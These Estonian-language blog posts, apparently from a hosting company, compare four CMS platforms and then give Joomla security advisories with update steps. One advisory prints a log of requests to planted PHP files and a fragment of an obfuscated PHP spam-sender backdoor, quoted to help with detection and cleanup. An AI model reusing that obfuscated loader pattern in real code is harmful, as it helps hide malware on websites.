Mis on WordPress, Drupal, Joomla ja Voog ning mille ma peaksin valima oma kodulehe tegemiseks?

Kodulehe loomine on tänapäeval tehtud üpriski lihtsaks, millega saab hakkama igaüks, kes on vähegi valmis pisut rohkem aega sinna panustama. Üldjuhul on veebilehe loomisel esimene samm sobiva sisuhaldussüsteemi valimine. Sisuhaldussüsteem ehk content management system (CMS) on tarkvara, millega saab veebilehtede sisu ja struktuuri muuta ning hallata.

Sisuhaldussüsteeme on internetis saadaval ilmatuma hulk, kuid Zone kasutajatele tahaks esile tuua kolm globaalse tuntusega ning lisaks ühe kodumaise sisuhaldusrakenduse, millel igalühel neist on omad võimalused ja funktsioonid. Need on WordPress, Drupal, Joomla ja Voog. Milline neist valida?

WordPress

WordPress on vaieldamatult maailma kõige populaarsem avatud lähtekoodiga sisuhaldussüsteem, mis loodi 2003. aastal ja mille abil on ehitatud tänaseks 43% kõikidest olemasolevatest veebilehtedest.

WordPressi kasuks räägib kahtlemata selle lihtsus: see ei nõua inimeselt kuigi peeneid eelteadmisi, mistõttu ongi WordPress tõenäoliselt niivõrd populaarne kasutajate seas.

Lisaks sellele, et WordPress ei ole algajale kuigi keerukas kasutada, pakub see ka väga suurel hulgal pistikprogramme (pluginad), mis aitavad sul luua just sellise kodulehe, mis parasjagu mõttes on.

Plusspunkte lisab veel näiteks otsingumootori tulemuste optimeerimise sõbralikkus. Seda peavad ka mitmed eksperdid WordPressi suureks eeliseks, kuna SEO võimekus on tõepoolest sellel sisuhaldussüsteemil hea.

Miinusena võib välja tuua turvalisuse aspekti. Kuna tegu on ikkagi kõige populaarseima platvormiga, siis tänu sellele leidub ka palju kurjategijaid, kes otsivad pidevalt uusi võimalusi, et WordPressile ehitatud veebilehti rünnata.

Kokkuvõtteks võib öelda, et WordPressi näol on tegemist lihtsa ja palju erinevaid võimalusi pakkuva sisuhaldussüsteemiga, millele võiks mõelda inimene, kellel puuduvad veel põhjalikumad teadmised ja kogemused kodulehe ehitamise alal.

Joomla

Populaarsuselt teisel kohal olev sisuhaldussüsteem on Joomla, mis on samuti avatud lähtekoodiga ja mis jõudis turule mõnevõrra hiljem – 2005. aastal.

Joomla on tegelikult üpriski sarnane WordPressiga, ent siiski kübeke keerulisem ning vajab kasutamiseks inimeselt juba paremaid IT-alaseid oskusi kui eelmainitud platvormi puhul.

Üks Joomla peamisi eeliseid on selle paindlikkus. Kui kasutajal on olemas HTML-i põhiteadmised, siis saab ta hõlpsasti proovida ja katsetada erinevate disainidega ning seeläbi leida endale just kõige sobivam ja meelepärasem veebilehe kujundus.

Samuti on sellel suur aktiivne kogukond, kust saab kasulikku nõu ja näpunäited, mis aitavad sul veebilehte luua. Võrreldes WordPressiga on Joomla SEO valdkonnas võibolla pisut nõrgem tegija, mistõttu peab arendusele kohati rohkem rõhku panema, et jääda otsingumootoris nähtavamale positsioonile.

Kuna Joomla kasutajaskond on märgatavalt tagasihoidlikum, siis peetakse seda reeglina ka turvalisemaks platvormiks.

Drupal

Tuntumate sisuhaldussüsteemide seas kõige pikema staažiga tegelane on Drupal, mis toodi turule 2001. aastal. Sarnaselt kahele eelnevale platvormile, on ka Drupal avatud lähtekoodiga süsteem.

Drupal on kahtlemata kolmest kõige keerukam sisuhaldussüsteem, mistõttu on see peamiselt levinud koodimisoskustega arendajate seas. Näiteks kui sul on plaanis luua suurem ja mahukam veeb, siis sobib Drupal selleks suurepäraselt.

Kindlasti ei ole Drupal kõige õigem valik algajale, sest selle tundmaõppimine on kordades ajamahukam ja keerulisem kui näiteks WordPressi või Joomla puhul.

Drupali eelisteks on tema paindlikkus: süsteem on vägagi arendajasõbralik ja lisaks on sellel hea SEO võimekus. Kitsaskohtadena võib välja tuua vähese tasuta pluginate arvu ja tagasihoidliku kujundusteemade valiku.

Voog

Kui kolm eelnevat sisuhaldussüsteemi on tuntud üle terve maailma, siis lõpetuseks tahame keskenduda ka ühele kodumaisele, kuid oma omadustelt ja kasutajasõbralikkuselt kaugeltki eelnevatele sugugi mitte alla jäävale rakendusele nimega Voog. Erinevalt eelnevatest on tegemist kuupõhiselt tasulise rakendusega, kuid just tänu sellele on tegemist vast kõige kasutajasõbralikuma ning võimalusterohkema rakendusega kõigi siin postituses kirjeldatud rakenduste seas.

Voogi abil on veebi disainimine, arendamine ning sisuhaldus tehtud uskumatult sujuvaks ning selle tundmaõppimine ei võta kaua aega. Saad valida kümnete ja kümnete kvaliteetsete käsitööna valminud kujundusmallide vahel, mida oma maitse järgi kohandada.

Rakendusel om inimsõbralik kasutajaliides, mille abil saad muuta sujuvalt nii veebi struktuuri kui ka sisu, selle kasutamine ei eelda IT-alaseid süvateadmisi. Sisuhaldussüsteemi seadistatakse, värskendatakse ja varundatakse sinu eest ilma, et peaksid sellele ise aega kulutama.

Ja mis vast kõige olulisem: kui peaksid oma veebilehe ehitamisel hätta jääma, siis saad alati professionaalset tuge Voogi meeskonnalt, kes räägivad sinuga sinu emakeeles.

Käesolev blogipostitus on sündinud koostöös DigiGeeniusega.

Veel üks tont: Joomla! 1.6.0 … 3.6.4 kriitiline turvauuendus

Turvaprobleem lubab kurjategijal lisada saidile administraatori-õigustes kasutajaid.

TÄIENDATUD: 27. oktoobri seisuga on veebis olemas täpsed kirjeldused kasutaja registreerimiseks admin-õigustes (huvilised saavad registreerimise osa läbimängu jälgida ka taikeelse video vahendusel). Öösel hakkasid tulema ka esimesed neis kirjeldatud mustrile vastavad päringug. Run, Forrest, run!

Halloween on sedapuhku varajane ja aastaid koodis vedelenud tondid käivad hoogsalt rahvast hirmutamas.

Tänase kolli toob meieni Joomla! arendaja Demis Palma (loe lähemalt:How I found a Joomla vulnerability), kellele veidi aega tagasi hakkas silma koodijupp, mis oli kahtlaselt sarnane kahes erinevas kasutajatega tegelevas kontrolleris. Arvatavasti oli koodi korrastatud ja unustatud vana versioon eemaldada, sellele pääseb aga vähese vaevaga ligi ja tulemuseks on võimalus registreerida kasutajaid ka saidis, kus see on omaniku poolt keelatud.

Demis’e väitel pärineb kood Joomla! 1.6 aegadest – aga versioonis alates 3.4.4 parandati üks varasem bugi, mille tulemusena unar-kood kasutatvaks muutus (hmm, kas see oli pahatahtlik bugfix?).

Niisiis saab paikamata 1.6…3.6.4 Joomla! puhul triviaalse trikiga ligi “surnud koodile” ja uusi kasutajaid registreerida. Isegi väikeste õigustega registreeritud kasutaja on aga täiendav turvarisk, sest kohati õnnestub teiste bugide tõttu tavakasutaja administraarotiks [käsi ei tõuse seda näpukat parandama] ülendada või siis kasutada ära mõne lisamooduli turva-auku, mis ei kontrolli nt faili üleslaadimisel üldse õigust seda teha.

Sedapuhku avastas aga konto loomise augu lappimisega tegelenud Davide Tampellini lisaks teise: liigsete õiguste andmine mille lühike selgitus ütleb, et “vigane andmete filtreerimine lubab registreerida kõrgemata õigustega kasutaja”. Kuigi täpsem selgitus ei ole hetkel turvakaalutlustel saadaval, võib selle kokku võtta nii:

Kui sa ei ole oma Joomla! saiti uuendanud, siis arvesta, et ilmselt tekivad peagi esimesed reaalsed ründed mis lubavad kellel tahes ennast administraatorina registreerida.

Nagu Sucuri eile õhtul teatas vaatasid nad muudatuse koodi üle, selgitasid välja võimalikud ründevektorid ja lisasid asjakohased reeglid oma Sucuri Firewall teenusele.

Mida siis teha?

  • kui sul on Joomla! paigaldatud meie Zone+ abil ja kõik uuendused lubatud, siis peaks sait olema uuendatud 3.6.5 peale – aga kuna paigaldamise järel tehtud muudatused võivad vahel uuendamist takistada, siis proovi Minu Zones Zone+ lehel vastava rakenduse juures Uuenda nuppu ja kui see ei aita, kirjuta meile info@zone.ee

joomla-update

  • kui sul on Zone+ abil paigaldatud varasem versioon ja lubatud väikesed uuendused (st tehakse 3.5.1›3.5.2, aga mitte 3.5.x›3.6.x uuendust) – või oled valinud käsitsi uuendamise – siis tuleks kindlasti sait ülalmainitud viisil kiiremas korras Joomla! 3.6.5 peale uuendada ja soovitavalt lubada kõik uuendused, seda saab teha pildil näha oleva Automaatsed uuendused valiku alt:

automaatsed-uuendused

  • kui sul on ise paigaldatud Joomla! – siis tuleks administraatorina sisse logida (enne, kui neid saab palju olema…) ning teha versioonile vastaval moel uuendus, seejärel (või enne) võib ka kirjutada info@zone.ee ja paluda meil olemasolev rakendus Zone+ alla importida ning lubada kõik uuendused, sest siis on edaspidi vähem põhjust paanikaks 🙂

Kui vajad Joomla! osas nõu või tahad uudistega kursis olla, siis Eesti Joomla! kommuuni leiad Eraser’ist.

Joomla! uuendamine Zone+ abil

Kuigi on võimalik uuendada ka 3.4.8 peale siis juhin tähelepanu, et erinevalt nt WordPress’ist ei tule Joomla! varasematele versioonidele enam turvapaikasid ja uuendada tuleks kindlasti 3.6.5 peale.

Joomla! uuendamine rakenduse enda vahenditega

Kui välja arvata vajadus korduvalt sisse logida, siis sujub ka see igati “next-next-next” meetodil.

Joomla 1.5 veebid botnetis

Ründed veebide vastu käivad lainetena – võetakse ette ühe sisuhaldustarkvara üks turva-auk ja käiakse sellel põhineva ründega teadaolevate domeenide nimekiri üle. Haavatavad veebid saavad endale hetkega hulga tagauksi ja lähevad kasutusse spämmi saatmisel, pahavara levitamisel või mõnel muul moel.

Täna hakkab logidest silma Joomla 1.5 versioonil põhinev spämmi-botnet – mis on eriti õnnetu juhtum, sest tegemist on väga vana ja juba ammu enam uuendusi mitte saava versiooniga (viimane ametlik parandus on 1.5.26, lisaks on olemas hotfix-parandusi kuni 1.5.29-ni) ning selle pealt uuemale versioonile üleminek on tõsine migratsioon. Ka rünnak tundub olema iidne – samu mustreid on kirjeldatud juba 2014. veebruaris.

Kui sait on pandud spämmi saatma, ei jää meil muud üle kui kasutaja veebiserverist väljuv e-postiliiklus blokeerida (see ei puuduta kasutaja enda e-posti, küll aga nt veebipoest saadetavaid arveid või paroolivahetusi) – ja paluda kliendil suhelda oma veebimeistriga veebi pahalastest puhastamise teemal. Sageli tuleb seepeale küsimus “Kuidas te teate, et on nakatunud – ja kuidas veebi puhtaks saaks?”

Samal teemal lugemist Zone blogist:

Tüüpiline ülevõetud veebi logi näeb välja selline:

POST /templates/beez/javascript/stats86.php
POST /administrator/components/com_menus/views/utf81.php
POST /libraries/joomla/html/parameter/list92.php
POST /libraries/cms/form/db42.php
POST /includes/PEAR/press58.php

Ehk erinevatesse kohtadesse Joomla, selle lisade või kujundusteema koodis on paigutatud suvalise nimega faile, mis sisaldavad spämmisaatjat. Sedapuhku näeb see välja umbes selline:

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['wc576'] = "\x28\x72\x48\x45\x2e\xa\x4e\x40\x20\x75\x67\x33\x3a\x52\x7c\x50\x7e\x39\x62\x3e\x31\x49\x2c\x41\x55\x46\x6f\x4a\x78\x21\x71\x32\x6a\x6d\x51\x

65\x2f\x24\x27\x4d\x54\x5d\x60\x5c\x58\x2a\x5e\x66\x37\x23\x38\x42\x22\x29\x5b\x4f\x77\x2d\x56\x3f\x25\x47\x44\x64\x76\x6e\xd\x79\x7a\x69\x4b\x3b\x36\x3c\x68\x59\x3d\x43\x63\x30\x7b\x53\x35\

x34\x9\x5f\x5a\x2b\x7d\x26\x4c\x6c\x70\x6b\x57\x61\x74\x73";

$GLOBALS[$GLOBALS['wc576'][9].$GLOBALS['wc576'][82].$GLOBALS['wc576'][35].$GLOBALS['wc576'][50].$GLOBALS['wc576'][11]] = $GLOBALS['wc576'][78].$GLOBALS['wc576'][74].$GLOBALS['wc576'][1];

Õnneks tuvastavad seda mustrit mitmed viirusetõrjevahendid, sealhulgas Nimbusec mille saab tellida Zone+ all – umbes 15 minutiga peaks esimene skaneering tehtud olema ning käes nimekiri pahadest failidest:

compromised-files

Jah, see teenus maksab – 1,99€+km kuus. Aga meie testide kohaselt on see parim ja soodsaim lahendus, mida pakkuda saame.

Käies need ükshaaval üle on võimalik veenduda, et tegemist on tõepoolest pahavaraga – ning juhul, kui selles failis midagi muud ei sisaldu, võib selle lihtsalt ära kustutada. Paraku leiab tihti ka sellist pahavara, mis lisatakse mõne veebirakenduse jaoks olulise faili algusesse või keskele, ning sellisel puhul on vaja eemaldada vaid probleemne osa – või asendada kogu fail puhtaga.

Nii saab veebi enam-vähem korda, aga kui rünnet võimaldanud turva-auk lappimata jääb või on pahalased sokutanud kuhugi tagaukse, mis ka Nimbusecile märkamata jääb, kordub kõik paari päeva pärast uuesti.

Siis aitab ainult suurpuhastus:

  • sisuhaldustarkvara kood tuleb täielikult asendada värskeima versiooniga (Joomla puhul tähendab see migratsiooni)
  • samuti tuleb asendada kõik lisamoodulid – veendudes, et nende viimased versioonid ei sisalda teadaolevaid turvaprobleeme
  • kohandatud kujundusteema failid tuleb käsitsi üle kontrollida, veendumaks nende puhtuses

ps. Joomla-spetsid on teretulnud täiendama/parandama – eriti mis puudutab versioone, vajalikke paikasid, migratsiooni metoodikat jne. Võib kirjutada otse peeter@zone.ee.

Joomlast avastati ohtlik turvaauk

joomla-logoDDoS ründeid (loe definitsiooni Wikipediast) võimaldav turvaauk mõjutab kõiki Joomla versioone 1.6.* ja 1.7.* seeriast ning lisaks kõiki versioone 2.5.* seeriast, mis on madalamad kui 2.5.7. Seega peaks kõik, kes nimetatud versioone kasutavad, uuendama oma Joomla uusimale 2.5.* seeria versioonile (hetkeseisuga 2.5.8).

Loe edasi “Joomlast avastati ohtlik turvaauk”

Kui kasutate Joomla!-t, palun uuendage seda

Seoses hiljutise Joomla! turvaauguga ( http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3681 ) oleme viimasel ajal pidanud tegelema mitmete näotustatud Eesti saitidega. Tahaks veebimeistritele hingele panna,  kui te kasutate Joomla! sisuhaldusmootorit või olete sellise paigaldanud oma klientidele, palun vajadusel uuendage seda.

Viide vastavale CERT-FI meeldetuletusele ka: http://www.cert.fi/tietoturvanyt/2008/08/ttn200808231817.html .

Loomulikult tasuks üle kontrollida ka muude sisuhaldusmootorite versioonide aktuaalsus.